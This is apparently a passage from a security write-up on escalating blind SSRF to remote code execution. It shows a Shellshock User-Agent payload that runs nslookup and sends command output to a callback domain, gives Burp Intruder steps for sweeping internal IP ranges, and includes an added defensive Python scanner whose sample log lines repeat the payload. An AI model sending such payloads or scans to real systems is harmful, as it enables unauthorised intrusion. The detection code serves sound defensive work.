Escalating Blind SSRF to a Remote Code Execution

User-Agent: () {:;}; /usr/bin/nslookup $(.whoami).myserver.com (this header is used to exploit the Shellshock vulnerability)

Referer: https://target.com/

A DNS query for uname.myserver.com will be sent to myserver.

If no response to the request shows up, we can conclude that the particular target is not vulnerable.
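From the defender's side, a header like the one above stands out in web access logs. The following is an added example, not code from the original post: it scans combined-format log lines for Referer or User-Agent values that begin like a bash function definition and extracts any callback domain to pivot on in DNS logs. The log lines are constructed samples, and the function name `find_shellshock_probes` is hypothetical.

```python
import re

# Apache/nginx "combined" format:
# ip ident user [time] "request" status bytes "referer" "user-agent"
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# Header value that starts like a bash function definition: "() {", spacing tolerated.
FUNC_DEF = re.compile(r'^\s*\(\s*\)\s*\{')
# Domain that directly follows a command substitution, e.g. "$(...).example.test".
CALLBACK = re.compile(r'(?:\$\([^)]*\)|`[^`]*`)\.((?:[a-z0-9-]+\.)+[a-z]{2,})', re.I)

# Constructed sample log lines (the first reuses the header values shown on this page).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 '
    '"https://target.com/" "() {:;}; /usr/bin/nslookup $(.whoami).myserver.com"',
    '198.51.100.4 - - [10/Oct/2023:13:56:01 +0000] "GET /index.html HTTP/1.1" 200 1024 '
    '"-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.9 - - [10/Oct/2023:13:57:12 +0000] "GET / HTTP/1.1" 200 64 '
    '"()  { :; }; echo probe" "curl/8.0"',
]

def find_shellshock_probes(lines):
    """Return one finding per header field that carries a function-definition prefix."""
    findings = []
    for line in lines:
        m = COMBINED.match(line.strip())
        if not m:
            continue  # not combined format; skip rather than guess at the fields
        for field in ("referer", "agent"):
            value = m.group(field)
            if FUNC_DEF.match(value):
                cb = CALLBACK.search(value)
                findings.append({
                    "ip": m.group("ip"),
                    "time": m.group("time"),
                    "field": field,
                    "callback_domain": cb.group(1).lower() if cb else None,
                })
    return findings

if __name__ == "__main__":
    for finding in find_shellshock_probes(SAMPLE_LOG):
        print(finding)
```

A non-empty `callback_domain` is the value to search for in resolver or DNS logs to see whether any internal host actually performed the lookup.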

To find the other internal networks, take one internal IP address, send it to Intruder, position the payload on the last octet of the IP address, and set the payload type to “number”. Set the payload step to 1, then start the attack.
